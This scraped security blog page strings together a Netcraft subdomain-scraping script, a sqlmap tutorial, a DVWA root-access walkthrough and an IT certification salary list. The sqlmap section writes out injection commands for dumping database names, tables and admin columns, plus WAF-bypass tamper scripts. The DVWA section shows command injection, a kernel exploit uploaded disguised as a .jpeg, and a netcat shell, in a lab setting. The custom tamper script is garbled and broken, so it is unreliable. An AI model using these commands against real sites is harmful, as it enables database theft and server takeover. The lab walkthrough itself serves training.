Netcraft Dns Search Engine

DNS Results From Netcraft Search Engine

The following python script is dedicated for CHC Members and it can obtain DNS results from netcraft search engine.This can be used in the information gathering stage of a penetration test.You can find the source code and a screenshot of the usage of this script below:


#!/usr/bin/python

import httplib

import re
import sys
import string
def help():
print "[netcraftdns v1.0] - by neuro [0x0lab.org]"
print "\nUsage: python netcraftdns.py <domain_name> \n"
sys.exit()
if len(sys.argv) < 1 or len(sys.argv) > 2:
help()
elif len(sys.argv) == 2:
domain_name =  sys.argv[1]
else:
help()

netcraftres=[]
totalnum=[]
def count(domain_name):
global nres
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
searchres_pattern='Found [0-9]*'
sp = re.compile(searchres_pattern, re.I)
res=sp.findall(rgdata)
for total in res:
resclean=re.sub('Found ', '', total)
nres=resclean
print "[+]-Total Netcraft Results:", nres
def results(domain_name):
y=21
i=1
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
pattern='[\w\.\-]+.'+domain_name
rgr = re.compile(pattern, re.I)
rgresults = rgr.findall(rgdata)
for netres in rgresults:
if netcraftres.count(netres) == 0:
netcraftres.append(netres)
print " |-", str(netres)
i=i+1
while y<nres:
if nres=="0":
break
rgi = httplib.HTTP('searchdns.netcraft.com')
rgi.putrequest('GET', "/?host=*."+domain_name+"&last="+netcraftres[-1]+"&from="+str(y)+"&restriction=site%20contains&position=")
rgi.putheader('Host', 'searchdns.netcraft.com')
rgi.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rgi.endheaders()
errcode, errmsg, headers = rgi.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata1 = rgi.getfile().read()
pattern2='[\w\.\-]+.'+domain_name
rgr1 = re.compile(pattern2, re.I)
rgresults1 = rgr.findall(rgdata1)
if y > int(nres):
break
else:
y = y + 20
for netres1 in rgresults1:
if netcraftres.count(netres1) == 0:
netcraftres.append(netres1)
print " |-", str(netres1)
i=i+1
count(domain_name)
results(domain_name)


netcraftdns – Sample Results

Advance Sqlmap Commands

Advance Sqlmap tutorial

1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case. The syntax for the GET request is as follow ./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy" The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.

2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" sqlmap will try to check if parameter "id" is injectable or not.

3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,a) Login into your application.b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5.... To get the tables of dummydb database , the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"

6.... To get the columns of admin table, the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"

7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.

9.... Writing your own Tamper script.There are certain cases when application has very weak detection signature but none of the tamper script can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to injectthat target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.So let us create our own tamper script. The format of any tamper script will be as follow


# Needed imports
from lib.core.enums import PRIORITY

#Define which is the order of application of tamper scripts against the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

''' Description of your tamper script

''' Description of your tamper script ''' Description of your tamper script '''

retVal = payload

# your code to tamper the original payload # return the tampered payload 

return retVal

Based on the above tamper script format, our script will be

#!/usr/bin/env python 
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
""" 
from lib.core.enums import PRIORITY __priority____priority__ = PRIORITY.NORMAL
def tamper(payload): 
""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """ 
INPUT    : UNION ALL SELECT 
OUTPUT : UNION ALL SELECT
TESTED AGAINST: mysql 5.x.x 
""" 
if payload: 
   retVal="" i=0 for i in xrange(len(payload)): 
if payload[i:i+10] == "ALL SELECT": 
  retVal +="ALL SELEcT" + payload[i+10:] 
break 
else: retval += payload[i] 
return retVal

Advanced Web Penetration

 Web Application Hacking

In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it here. The installation is there too.

- Start up your apache and mysql.

- Open dvwa in browser.

- Login with username : admin and password : password.

- DVWA main page.

- The vulnerability that I'll use to gain root access from this web is through its "command execution" vulnerability because in a web, this is the most dangerous feature to have. Hacker can get a shell without having to place a backdoor inside the server.

- Set the security level to medium. (because 'low' would be too easy and 'hard' would be too difficult..   :P   )

- Lets try to do a normal command.

- Next, lets execute multiple command.

 

- Lets try to use pipe "|". 

- Looking good. Now, lets begin the attack.  >:)

- I'll use a local exploit on the system to gain the root access. Before searching the exploit, lets see what version of kernel the system running.

- Search the exploitdb for the local exploit. Using keyword "2.6.39" I found this exploit created by zx2c4 coded in C language.

- After download the exploit, lets compile it first before transferring it to the target. Original Exploit code here.

- Exploit ready to be used.

- Now lets try to upload it using "File Upload" on dvwa. Before doing that, I'll increase dvwa security into High level because it is a rule in my training center.

- Ok, lets try to upload the exploit.

- Whoops, it looks like the server only accept image file to be uploaded.

- Lets try to add image extention into the exploit. I'll make it into exploit.jpeg

- Upload it.

- Good. Now, lets connect to the server using netcat to execute that exploit.

- Back to "Command Execution" feature. (Don't forget to change the dvwa security to medium again)

- Lets see if the exploit is correctly uploaded.

- Now, execute netcat on the dvwa on listening mode.

- Look on the bottom/status bar. The browser will wait for a connection. In backtrack's terminal type this. "nc 127.0.0.1 4321"

- Then, move to the directory where the exploit is located.

- Execute it.  

- Not good, the exploit didn't work properly.  =,=

- Turns out that I haven't change the permission to execute the exploit.  :P

- To change it simply type "chmod 777 exploit.jpeg"

- Next, lets try to execute it again.

-Its running. But the process to spawn a root shell is taking so long. I wonder if the exploit is succeeded. Have to research more..  :)

Top 10 Highest Paying Computer/ IT Courses

Number 10 : CCNP : Cisco Certified Network Professional :

Requirements : Cisco CCNA Routing and Switching Certifications.

At number 10 we have Cisco Certified Network Professional [CCNP] Certification, Though being the most popular choice of college students, It is not the highest paying certification in our list. If you want to be in a network technician, support engineer, systems engineer or network engineer The CCNP certification is for you.

Certification Exam Cost : 300 $

Average Salary : 80,750 $

Number 9 : MCITP : Database Administrator :

Requirements : Pass the Microsoft Certified Technical Specialist certification in SQL Server 2008.

Running on number 9, we have Microsoft Certified IT Professional [MCITP] Certification, To do this, you have to take exam 70-432 and 70-450, The MCITP certification validates that the IT professional is capable of deploying, building, designing, optimizing, and operating technologies for a particular job role. MCITP certifications builds on the technical proficiency .measured in the Microsoft Certified Technology Specialist (MCTS) certifications.

Certification Exam Cost : 80$ Per Paper.

Average Salary : 90,200 $.

Number 8 : ITIL V3 Certification :

Requirements :

ITIL stands for: Information Technology Infrastructure Library. It is useful for people who's organization has ITIL Framework. This certification exam gives you knowledge of Service Strategy, Service Design, Service Transition, Service Operation and Continual Service Improvement.

Certification Exam Cost : 150 $.

Average Salary : 91,000 $

Number 7 : VCP Certification :

Requirements : Coaching From a VCP Certified Centre : 2400 $

In this world where virtualization is taking a major role, VMware is one of the leading vendors of virtualization products and earning a VMware certification is the first step toward gaining industry-recognized expertise in virtual infrastructure. Earning the VCP certification demonstrates that you can successfully install, deploy, scale, and manage VMware vSphere environments. The people with VMware knowledge are in very high demand but the course cost is too much, that's why it has landed on our 7th spot.

Certification Exam Cost : 175 $ + 2400 $ Coaching Classes.

Average Salary : 93,000 $

Number 6 : MCAD : Microsoft Certified Application Developer :

Requirements : None.

Good at developing applications ? Then the Microsoft Certified Application Developer [MCAD] Certification is for you. Running at position 6, MCAD Certification tells the world that you are ready to deploy powerful applications using Microsoft Visual Studio .NET and Web services. The Responsibilities include implementing requirements, developing, testing, deploying, and maintaining department-level applications components, Web or desktop clients, or back-end data services by using Microsoft tools and technologies.

Certification Exam Cost : 500-600 $, 3 Exams Each of 125 $ and 2 MS prep kits.

Average Salary : 94,000 $

Number 5 : CCDA: Cisco Certified Design Associate :

The Cisco Certified Design Associate (CCDA) tells your employer that you have a strong foundation and apprentice knowledge of network design for Cisco converged networks. A CCDA certification is for network design engineers, technicians, and support engineers, who enable efficient network environments. This certification will help you in giving a better knowledge of LAN, WAN, and broadband access for businesses and organizations.

What is the difference between CCNA and CCDA ?
The job roles between a CCNA and CCDA are different. The CCNA is a configuration and troubleshooting exam. The CCDA indicates a foundation knowledge of network design for the Cisco converged network. CCDA certified professionals can design routed and switched network infrastructures and services involving LAN, WAN, and broadband access for businesses and organizations. Also CCDA pays a lot better !

Certification Exam Cost : 150 $

Average Salary : 95,000 $

Number 4 : MCDBA: Microsoft Certified Database Administrator :

The Microsoft Certified Database Administrator credential provides database professionals with an opportunity to showcase their SQL Server skills. If you'd like to prove your prowess to a prospective employer, take a step up the career ladder in your current job, or simply earn a nice certificate to hang on the wall, the MCDBA credential may be a great step for you. The main reason It is on our 4 position is because the MCDBA certification has a great demand in the market.

Certification Exam Cost : 450 $

Average Salary : 96,000 $

Number 3 : Certified Information Systems Security Professional :

Requirements : To gain CISSP certification, you need to have five years of Infosec experience (or four years and a degree) and endorsement from another CISSP, plus you have to score at least 70 percent on a 250-question multiple-choice test. Also a clean history (no criminal records0.

Running at number 3, We have Certified Information Systems Security Professional [CISSP] Certification, A must have certification degree for computer security specialist, The CISSP is one of the most recognized degree in the world. But getting this degree is a lot of trouble, If you think you want to avoid it, There are some alternatives to this degree like : CEH, CISA And OSCP. Actually a lot of people now consider having a CEH Degree instead of CISSP. But it doesn't pay as much as CISSP.

Certification Exam Cost : 550 $ + 85 $ Per year Maintenance Fee.

Average Salary : 100,000 $.

Number 2 : PMI Certified Associate in Project Management :

Requirements : High School Diploma + 1,500 hours of project experience.

Certification Exam Cost : 300 $

Average Salary : 101,105 $.

Number 1 : PMI Project Management Professional :

Requirements : 4,500 hours leading and directing projects and 35 hours of project management education.

On position 1, The Project Management Professional Certification by Project Management Institute is recognized as the most important certification for project managers. It is globally acknowledged, in heavy demand, and highly sought after by corporations and individuals alike. A Project Management Professional designation demonstrates that you have not only the experience but also the education to successfully lead and direct projects. That means once you have got the PMP Certification, you'll be playing in money, Just like a PIMP.

Certification Exam Cost : For PMI Member : 250 $, For Non PMI Member : 400 $

Average Salary : 110,750 $